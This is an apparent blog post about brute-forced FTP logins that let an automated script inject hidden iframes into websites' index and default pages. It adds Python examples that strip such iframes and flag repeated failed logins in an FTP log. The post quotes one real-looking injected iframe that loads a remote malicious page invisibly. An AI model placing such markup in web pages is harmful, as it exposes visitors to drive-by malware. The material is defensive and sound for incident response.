Brute Force FTP Password Hacking On The Rise

I know of at least six websites that I provide support for that have had malicious code embedded into their web pages in the last few months. The common entry point for the hackers in all of these cases has been FTP login. Each site had a simple username/password combination and hence was fairly easy to get into. It seems that the hackers are using an automated script to insert their code, as I've found that every single file with a filename containing the words "index" or "default" gets modified, regardless of the extension (whether .htm, .html, .php, .asp, etc.) and regardless of whether the file is actually linked to or not.

Commonly, an invisible iframe like the following gets inserted right after the <body> tag or else at the very end of the file. The visitor sees nothing, because the style hides the frame, but the browser still fetches the remote page.

<iframe src="http://3e0.ru:8080/index.php" width=160 height=188 style="visibility: hidden"></iframe>

The page on the remote site then delivers the real payload to the visitor's browser. Sometimes JavaScript is inserted instead of an iframe; again, that JavaScript only loads an external script file, and the external file contains the real payload.

If your clients haven't made recent backups you will need to either remove the offending code snippets by hand or else write a script to do it for you (if many files are affected). Change the FTP password that was used to get in before you clean up; otherwise the attacker's automated script simply re-inserts the code. If you leave the code in place or don't remove it quickly enough, the site will end up on Google's blacklist. Browsers like Firefox will then not show the site and instead put up a big red warning page. IE will continue to show the hacked pages and is probably the target of the malicious code in the first place. If your site does get blacklisted you will need to request a re-scan from Google.
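A cleanup script of the kind described above, added here as an example rather than anything from the original post. It assumes the injection looks like the hidden iframe quoted earlier and, by default, mirrors the observation that only files named index* or default* are touched; the sample pages it builds in a temporary directory are constructed for the demonstration.

```python
"""Remove injected hidden iframes from a web root.

Added example, not code from the original post. Assumes the injected markup
looks like the hidden <iframe> shown above (style "visibility: hidden";
"display: none" is handled as a common variant) and that the affected files
are those whose names contain "index" or "default", whatever the extension.
"""
import os
import re
import shutil
import tempfile

# An <iframe ...></iframe> carrying a style attribute. Attribute values may be
# double-quoted, single-quoted or bare (the sample uses bare width/height).
IFRAME_WITH_STYLE = re.compile(
    r"""<iframe\b[^>]*\bstyle\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+)[^>]*>\s*</iframe\s*>""",
    re.IGNORECASE | re.DOTALL,
)
# Styles that make the frame invisible to the visitor.
HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)

# The injection quoted in the post, reused here as constructed sample input.
SAMPLE_INJECTION = (
    '<iframe src="http://3e0.ru:8080/index.php" width=160 height=188 '
    'style="visibility: hidden"></iframe>'
)


def is_target(filename):
    """True for the files the injector touches: the name contains index/default."""
    name = os.path.basename(filename).lower()
    return "index" in name or "default" in name


def strip_hidden_iframes(html):
    """Return (cleaned_html, removed_tags). Visible iframes are left alone."""
    removed = []

    def replace(match):
        tag = match.group(0)
        if HIDDEN_STYLE.search(tag):
            removed.append(tag)
            return ""
        return tag

    return IFRAME_WITH_STYLE.sub(replace, html), removed


def clean_tree(root, only_targets=True):
    """Walk root, clean each file (by default only index/default names) and keep a
    .bak copy of anything changed. Returns {relative_path: iframes_removed}."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".bak") or (only_targets and not is_target(name)):
                continue
            path = os.path.join(dirpath, name)
            # surrogateescape round-trips bytes that are not valid UTF-8 unchanged
            with open(path, encoding="utf-8", errors="surrogateescape") as fh:
                original = fh.read()
            cleaned, removed = strip_hidden_iframes(original)
            if not removed:
                continue
            shutil.copy2(path, path + ".bak")
            with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                fh.write(cleaned)
            report[os.path.relpath(path, root).replace(os.sep, "/")] = len(removed)
    return report


def demo():
    """Build a constructed web root in a temp dir, clean it and summarise.
    Returns (report, leftover); leftover counts hidden iframes still present in
    target files afterwards and should be 0."""
    root = tempfile.mkdtemp(prefix="ftpclean_")
    pages = {
        "index.html": "<html><body>" + SAMPLE_INJECTION + "<p>Home</p></body></html>",
        "sub/default.asp": "<html><body><p>Shop</p>" + SAMPLE_INJECTION + "</body></html>",
        # A legitimate, visible embed that must survive cleaning.
        "sub/index.php": '<html><body><iframe src="/map" style="border:0"></iframe></body></html>',
        # Not a target name, so left alone by default (only_targets=False sweeps it too).
        "about.html": "<html><body>" + SAMPLE_INJECTION + "</body></html>",
    }
    for rel, body in pages.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    report = clean_tree(root)
    leftover = 0
    for rel in pages:
        if is_target(rel):
            with open(os.path.join(root, *rel.split("/")), encoding="utf-8") as fh:
                leftover += len(strip_hidden_iframes(fh.read())[1])
    shutil.rmtree(root)
    return report, leftover


if __name__ == "__main__":
    print(demo())
```

Run it against a copy of the site first. The pattern only removes iframes whose style hides them, so a legitimate visible embed survives; pass only_targets=False to sweep the whole tree rather than trusting the index/default naming, and keep the .bak files until the cleaned pages have been checked. Injected script tags need the same treatment with a pattern matching the external src the attacker used.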

The easiest way to avoid this hack is simply to make sure that all your (and your clients') passwords are not overly simple, since a brute-force script only succeeds against passwords it can guess within its word list or search space. The password "password" is not a good choice, while "fuMrHack8" is a reasonable one and a longer random one is better still. Bear in mind that plain FTP sends the password across the network in cleartext, so where the host offers SFTP or FTPS it is worth using that instead.
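Strong passwords stop the guessing from paying off; the FTP server's log shows whether it is being tried and, more importantly, whether a guess eventually worked. The following is an added example, not code from the original post: it reads vsftpd-style OK LOGIN / FAIL LOGIN lines (the sample lines are constructed) and flags client addresses that fail many times, together with any account they then logged into.

```python
"""Spot FTP brute-force attempts, and guesses that succeeded, in an FTP log.

Added example, not part of the original post. The log lines are constructed
in the format vsftpd writes (OK LOGIN / FAIL LOGIN with the client IP);
adapt LINE for another server such as proftpd or pure-ftpd.
"""
import re
from collections import defaultdict

LINE = re.compile(
    r'^\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4} \[pid \d+\] \[(?P<user>[^\]]*)\] '
    r'(?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)

# Constructed sample: one attacker cycling passwords against "admin" until one
# works, and one legitimate user who mistypes once.
SAMPLE_LOG = """\
Sun Aug  2 03:14:01 2009 [pid 2] [admin] FAIL LOGIN: Client "203.0.113.7"
Sun Aug  2 03:14:02 2009 [pid 2] [admin] FAIL LOGIN: Client "203.0.113.7"
Sun Aug  2 03:14:02 2009 [pid 2] [admin] FAIL LOGIN: Client "203.0.113.7"
Sun Aug  2 03:14:03 2009 [pid 2] [webmaster] FAIL LOGIN: Client "203.0.113.7"
Sun Aug  2 03:14:03 2009 [pid 2] [admin] FAIL LOGIN: Client "203.0.113.7"
Sun Aug  2 03:14:04 2009 [pid 2] [admin] FAIL LOGIN: Client "203.0.113.7"
Sun Aug  2 03:14:05 2009 [pid 2] [admin] OK LOGIN: Client "203.0.113.7"
Sun Aug  2 09:01:10 2009 [pid 2] [alice] FAIL LOGIN: Client "198.51.100.2"
Sun Aug  2 09:01:20 2009 [pid 2] [alice] OK LOGIN: Client "198.51.100.2"
Sun Aug  2 09:05:00 2009 [pid 2] [alice] OK LOGIN: Client "198.51.100.2"
"""


def parse(lines):
    """Yield (user, result, ip) for each login line; other log lines are skipped."""
    for line in lines:
        m = LINE.match(line)
        if m:
            yield m.group("user"), m.group("result"), m.group("ip")


def analyse(lines, threshold=5):
    """Per client IP: failure count, usernames tried, and accounts logged into
    after at least `threshold` failures (the signature of a guess that landed)."""
    stats = defaultdict(lambda: {"fail": 0, "users": set(), "compromised": set()})
    for user, result, ip in parse(lines):
        s = stats[ip]
        if result == "FAIL":
            s["fail"] += 1
            s["users"].add(user)
        elif s["fail"] >= threshold:
            s["compromised"].add(user)
    return dict(stats)


def suspicious(lines, threshold=5):
    """IPs that crossed the failure threshold, with any accounts they got into."""
    return {ip: (s["fail"], sorted(s["compromised"]))
            for ip, s in analyse(lines, threshold).items() if s["fail"] >= threshold}


if __name__ == "__main__":
    for ip, (fails, accounts) in suspicious(SAMPLE_LOG.splitlines()).items():
        note = f", then logged in as {', '.join(accounts)}" if accounts else ""
        print(f"{ip}: {fails} failed logins{note}")
```

An address that fails repeatedly and then succeeds is the case to act on: that account's password has been guessed and its web root should be checked for the injected code. Feeding the same counts into a firewall block or the server's own per-IP failure limit slows the guessing down, though it does not replace a password the script cannot guess.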